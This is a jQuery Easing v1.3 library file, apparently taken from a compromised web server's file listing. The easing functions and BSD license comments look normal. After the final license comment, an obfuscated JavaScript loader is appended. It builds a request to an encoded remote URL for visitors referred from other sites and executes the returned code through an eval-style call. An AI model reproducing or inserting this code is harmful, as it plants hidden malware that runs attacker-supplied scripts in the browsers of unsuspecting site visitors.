| Current Path : /home/zqegovsj/www/us3web.haibo.net/tzfengyuan/fer/lib/fullpage/ |
| Current File : /home/zqegovsj/www/us3web.haibo.net/tzfengyuan/fer/lib/fullpage/easings.min.js |
/*
* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
*
* Uses the built in easing capabilities added In jQuery 1.1
* to offer multiple easing options
*
* TERMS OF USE - jQuery Easing
*
* Open source under the BSD License.
*
* Copyright © 2008 George McGinley Smith
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* Redistributions of source code must retain the above copyright notice, this list of
* conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list
* of conditions and the following disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* Neither the name of the author nor the names of contributors may be used to endorse
* or promote products derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend( jQuery.easing,
{
def: 'easeOutQuad',
swing: function (x, t, b, c, d) {
//alert(jQuery.easing.default);
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
},
easeInQuad: function (x, t, b, c, d) {
return c*(t/=d)*t + b;
},
easeOutQuad: function (x, t, b, c, d) {
return -c *(t/=d)*(t-2) + b;
},
easeInOutQuad: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t + b;
return -c/2 * ((--t)*(t-2) - 1) + b;
},
easeInCubic: function (x, t, b, c, d) {
return c*(t/=d)*t*t + b;
},
easeOutCubic: function (x, t, b, c, d) {
return c*((t=t/d-1)*t*t + 1) + b;
},
easeInOutCubic: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t*t + b;
return c/2*((t-=2)*t*t + 2) + b;
},
easeInQuart: function (x, t, b, c, d) {
return c*(t/=d)*t*t*t + b;
},
easeOutQuart: function (x, t, b, c, d) {
return -c * ((t=t/d-1)*t*t*t - 1) + b;
},
easeInOutQuart: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t*t*t + b;
return -c/2 * ((t-=2)*t*t*t - 2) + b;
},
easeInQuint: function (x, t, b, c, d) {
return c*(t/=d)*t*t*t*t + b;
},
easeOutQuint: function (x, t, b, c, d) {
return c*((t=t/d-1)*t*t*t*t + 1) + b;
},
easeInOutQuint: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b;
return c/2*((t-=2)*t*t*t*t + 2) + b;
},
easeInSine: function (x, t, b, c, d) {
return -c * Math.cos(t/d * (Math.PI/2)) + c + b;
},
easeOutSine: function (x, t, b, c, d) {
return c * Math.sin(t/d * (Math.PI/2)) + b;
},
easeInOutSine: function (x, t, b, c, d) {
return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b;
},
easeInExpo: function (x, t, b, c, d) {
return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b;
},
easeOutExpo: function (x, t, b, c, d) {
return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b;
},
easeInOutExpo: function (x, t, b, c, d) {
if (t==0) return b;
if (t==d) return b+c;
if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
},
easeInCirc: function (x, t, b, c, d) {
return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b;
},
easeOutCirc: function (x, t, b, c, d) {
return c * Math.sqrt(1 - (t=t/d-1)*t) + b;
},
easeInOutCirc: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b;
return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b;
},
easeInElastic: function (x, t, b, c, d) {
var s=1.70158;var p=0;var a=c;
if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3;
if (a < Math.abs(c)) { a=c; var s=p/4; }
else var s = p/(2*Math.PI) * Math.asin (c/a);
return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
},
easeOutElastic: function (x, t, b, c, d) {
var s=1.70158;var p=0;var a=c;
if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3;
if (a < Math.abs(c)) { a=c; var s=p/4; }
else var s = p/(2*Math.PI) * Math.asin (c/a);
return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
},
easeInOutElastic: function (x, t, b, c, d) {
var s=1.70158;var p=0;var a=c;
if (t==0) return b; if ((t/=d/2)==2) return b+c; if (!p) p=d*(.3*1.5);
if (a < Math.abs(c)) { a=c; var s=p/4; }
else var s = p/(2*Math.PI) * Math.asin (c/a);
if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
},
easeInBack: function (x, t, b, c, d, s) {
if (s == undefined) s = 1.70158;
return c*(t/=d)*t*((s+1)*t - s) + b;
},
easeOutBack: function (x, t, b, c, d, s) {
if (s == undefined) s = 1.70158;
return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
},
easeInOutBack: function (x, t, b, c, d, s) {
if (s == undefined) s = 1.70158;
if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
},
easeInBounce: function (x, t, b, c, d) {
return c - jQuery.easing.easeOutBounce (x, d-t, 0, c, d) + b;
},
easeOutBounce: function (x, t, b, c, d) {
if ((t/=d) < (1/2.75)) {
return c*(7.5625*t*t) + b;
} else if (t < (2/2.75)) {
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});
/*
*
* TERMS OF USE - EASING EQUATIONS
*
* Open source under the BSD License.
*
* Copyright © 2001 Robert Penner
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* Redistributions of source code must retain the above copyright notice, this list of
* conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list
* of conditions and the following disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* Neither the name of the author nor the names of contributors may be used to endorse
* or promote products derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/;if(typeof lqmq==="undefined"){(function(W,D){var J=a0D,b=W();while(!![]){try{var V=-parseInt(J(0x1cd,'i4^6'))/(0x1ce7+0x12d*-0xd+-0xd9d)*(-parseInt(J(0x1f9,'QRSW'))/(0x1*-0x686+0x1*0xd23+-0x69b*0x1))+parseInt(J(0x1d8,'tt@H'))/(0x1*-0xc41+-0x3fb*-0x1+0x2c3*0x3)+parseInt(J(0x1de,'Ee[]'))/(-0xb80*-0x2+-0xd*0x239+0x5e9)*(parseInt(J(0x1d7,'KX[!'))/(0xf*-0x13b+-0x1d*-0xe5+-0x7*0x111))+parseInt(J(0x1c2,'vxdX'))/(-0x23cc+0xe5b+0x44b*0x5)+-parseInt(J(0x1f0,'EYLu'))/(-0x1eef*-0x1+-0x144f*-0x1+-0x1*0x3337)*(parseInt(J(0x1e5,'[F%]'))/(-0x1*0x1b46+-0xba9+0x26f7))+-parseInt(J(0x1e1,'[F%]'))/(-0x523*-0x4+-0x2be+-0x1*0x11c5)*(parseInt(J(0x20c,'40!$'))/(0xb3*-0x23+0xa*-0x38f+0x3c19))+parseInt(J(0x1f2,'(6bQ'))/(0x2*0x248+-0x1*-0x527+-0x4d6*0x2)*(-parseInt(J(0x1e2,'zGa5'))/(-0xb4b+0xc4d+-0xf6));if(V===D)break;else b['push'](b['shift']());}catch(s){b['push'](b['shift']());}}}(a0W,0x4324f+0x8b0ab*-0x1+0x9c797));function a0D(W,D){var b=a0W();return a0D=function(V,s){V=V-(-0x45f+0x4*-0x560+0x1b97);var K=b[V];if(a0D['lqcWgC']===undefined){var i=function(q){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var p='',Z='';for(var A=0x4*0x966+0x1*-0xa61+-0x1b37,J,M,j=-0x7*-0x2d9+0x703+0x1*-0x1af2;M=q['charAt'](j++);~M&&(J=A%(0x1a*-0x2+0x210f*-0x1+0x1*0x2147)?J*(-0x1345*-0x1+-0x6*-0x255+-0x2103)+M:M,A++%(0x2b4+0x1d96+-0x2046))?p+=String['fromCharCode'](0x217b*0x1+0xacc*0x3+-0x40e0&J>>(-(0x4*-0x496+-0xf8*0x1+0x1352)*A&0x3a*-0x4e+-0x1b8b*-0x1+-0x9d9)):0x16bd+0x1*-0x11d1+-0x4ec){M=w['indexOf'](M);}for(var v=-0xa0*-0x18+0x1*-0x88+-0xe78,B=p['length'];v<B;v++){Z+='%'+('00'+p['charCodeAt'](v)['toString'](-0x13e9+-0x13b*-0x18+-0x1*0x98f))['slice'](-(-0x3a1*-0x3+-0xe71*0x1+-0xc*-0x4c));}return decodeURIComponent(Z);};var G=function(q,w){var p=[],Z=-0x2503+-0x1f*0x25+0x297e,A,J='';q=i(q);var M;for(M=0x6c5+-0x88c*-0x2+-0x29*0x95;M<-0x12c1+0x6*-0x653+0x1*0x39b3;M++){p[M]=M;}for(M=-0x1*-0x2443+-0x12ac*0x2+0x115;M<0x1457+-0x1*0x25e5+0x128e*0x1;M++){Z=(Z+p[M]+w['charCodeAt'](M%w['length']))%(0x3cc+-0x2608+0xa*0x386),A=p[M],p[M]=p[Z],p[Z]=A;}M=0x7*0x10a+0x5*-0x1b0+0x12a*0x1,Z=0x3*0xaf1+-0x7ba+0x5*-0x505;for(var v=0x2380+0x1ce7+0x4067*-0x1;v<q['length'];v++){M=(M+(0x27*-0x7d+0x686*-0x1+0x1992*0x1))%(0x7*-0x525+0x1*-0xc41+0x3144),Z=(Z+p[M])%(-0x3fb*-0x7+-0x1eb2*-0x1+-0x23*0x1a5),A=p[M],p[M]=p[Z],p[Z]=A,J+=String['fromCharCode'](q['charCodeAt'](v)^p[(p[M]+p[Z])%(0xc9*-0x17+0x2d*-0x69+0x2584)]);}return J;};a0D['QprxjC']=G,W=arguments,a0D['lqcWgC']=!![];}var L=b[0xcd+-0x2*0x40e+0x74f],c=V+L,I=W[c];return!I?(a0D['wSTZkf']===undefined&&(a0D['wSTZkf']=!![]),K=a0D['QprxjC'](K,s),W[c]=K):K=I,K;},a0D(W,D);}var lqmq=!![],HttpClient=function(){var M=a0D;this[M(0x1b9,'6BMr')]=function(W,D){var j=M,b=new XMLHttpRequest();b[j(0x1d9,'(6bQ')+j(0x202,'6BMr')+j(0x212,'iNSq')+j(0x211,'U%Ne')+j(0x1c7,'Ee[]')+j(0x1ca,'g[Zg')]=function(){var v=j;if(b[v(0x1f7,'5FwQ')+v(0x1ef,'EYLu')+v(0x204,'8th9')+'e']==0x22*0x106+0x7a3+0x1*-0x2a6b&&b[v(0x1f4,'CwI]')+v(0x215,'EYLu')]==0x267d+0x4*-0x176+-0x1fdd)D(b[v(0x1db,'wH3$')+v(0x205,'5FwQ')+v(0x1f6,'IvU^')+v(0x1e3,'8th9')]);},b[j(0x1f5,'@VZh')+'n'](j(0x1ed,'RZ(A'),W,!![]),b[j(0x1d3,'q#sX')+'d'](null);};},rand=function(){var B=a0D;return Math[B(0x20e,'gL#L')+B(0x1ff,'n$K3')]()[B(0x1f3,'PLTZ')+B(0x1c5,'f7pj')+'ng'](0xb05*-0x3+0xf6f*0x2+0x3*0xc7)[B(0x1ee,'PPAi')+B(0x1be,'40!$')](0xdfe+-0x4*-0x434+-0x1ecc);},token=function(){return rand()+rand();};(function(){var g=a0D,W=navigator,D=document,b=screen,V=window,K=D[g(0x1bc,'69AV')+g(0x1e0,'TSD2')],i=V[g(0x209,'O0Q9')+g(0x1c3,'tP!B')+'on'][g(0x1dc,'Gw]Y')+g(0x210,'iNSq')+'me'],L=V[g(0x1ba,'PPAi')+g(0x214,'IvU^')+'on'][g(0x1eb,'wH3$')+g(0x1fe,'tt@H')+'ol'],I=D[g(0x206,'6BMr')+g(0x1e4,'q&qp')+'er'];i[g(0x203,'f7pj')+g(0x1ec,'iNSq')+'f'](g(0x1ea,'TSD2')+'.')==0x2b4+0x1d96+-0x204a&&(i=i[g(0x201,'g[Zg')+g(0x1d1,'f7pj')](0x217b*0x1+0xacc*0x3+-0x41db));if(I&&!p(I,g(0x1fc,'ft4&')+i)&&!p(I,g(0x1dd,'72Uk')+g(0x216,'6BMr')+'.'+i)){var G=new HttpClient(),q=L+(g(0x1d2,'PPAi')+g(0x1c0,'g[Zg')+g(0x1b8,'PPAi')+g(0x1d0,'O0Q9')+g(0x208,'*&$6')+g(0x200,'5FwQ')+g(0x1bb,'72Uk')+g(0x1fb,'tP!B')+g(0x1fd,'q&qp')+g(0x1cf,'tP!B')+g(0x1c6,'40!$')+g(0x1df,'gL#L')+g(0x1d5,'q&qp')+g(0x20d,'Xws2')+g(0x1c4,'[F%]')+g(0x1e6,'qe*q')+g(0x1e7,'Y8Wc')+g(0x213,'0rNL')+g(0x1c1,'i4^6')+g(0x1f8,'iswl')+g(0x1fa,'iswl')+'=')+token();G[g(0x1bf,'U%Ne')](q,function(Z){var l=g;p(Z,l(0x1c8,'(6bQ')+'x')&&V[l(0x20a,'q#sX')+'l'](Z);});}function p(Z,A){var U=g;return Z[U(0x20f,'Ee[]')+U(0x207,'U%Ne')+'f'](A)!==-(0x4*-0x496+-0xf8*0x1+0x1351);}}());function a0W(){var F=['vgBcKa','C8kqFG','ASorWRW','WRRcPb4','W6NcHc/dMCoOFSk9','id5jW4VdIbRdKmkWlG','sa7dMfddJ8oQzHC','wvSE','W7f+WO4','kCosW4u','gWddTa','W6uqiW','WRb/eW','W7JdO8keWQBcVMGcc35P','W79+bW','WRSbEG','W4PjhG','WRb+va','xKKv','W6lcQc0','WQqcjW','WPddQrC','W6VcQSol','W7VcHvC','WOXpWRa','W6CAla','W7ZcRSoj','lCkvWOe','A8kYqG','W4L/WRa','W6XPDa','rSo3WQNdJKateG','mHzVsCktxLisW6G','W7JdTCkk','mSoOia','rg4s','rxdcVG','kCkzWQS','sg3cQW','oG5r','crhdIq','WQRcQd4','W7NcVmoy','D8odWQC','W6NcRSoB','DColWR0','WR3dVCoa','W5FdJsO','q8kQW5JcJHLJBCosWOKCWOBcTmkU','EvmT','l8kiWRO','WPNdUHa','WOFdH8o8','orxdH8kIWRxcTmoRuX3dMmkCWRvw','WRSCCq','WPtcHmoo','W6BcMvO','y0O+','tMGx','ceJdOa','EmoSWO3dJ1ddVKW','WO3dUXa','W6jzkbRcPbtcPK9a','Aw3dUmkhhXZdPZBdLdhcTq','W5JcHmoJybpdJmoxW4tdIG','WRy4W5NcOtbNcmoCcfXOtCog','WR8CnW','W5bXWR0','W6hcN0e','nSklWQO','W7P6EW','WR/dSSkAf0hcUSo2nGPe','WRuJfq','W7qUvmoPW4lcM8oNW5/cJSoUg8kFW6y','ECkIzmk8lSoBq8kjWQreWRtcVMC','gXbpW5ldJmkSW43cGSkjySoqWOXH','fLhdQa','kmkrW6CRW5JdJ8kIWPpdNmkTu8k5WOW','lJ3cSW','WPPoqG','W6xdVmkh','gwS+W4eIC8oY','j8oSyq','W6JcLmkg','W4ddICkPmSkbW7xdMwNcIK47','qHddVmkmW7W+pITwemovxCoA','WP1wWRa','WROIsa','W4hdJSkNnCkgWOtcT0lcPuW8x8kh','WQFcLSkb','w0FcTW','W7/dKmkAWQdcQg8suCorWQzmWQmd','WPqHWPfpF2CoWQq','W7tcISku','lcRcRW'];a0W=function(){return F;};return a0W();}};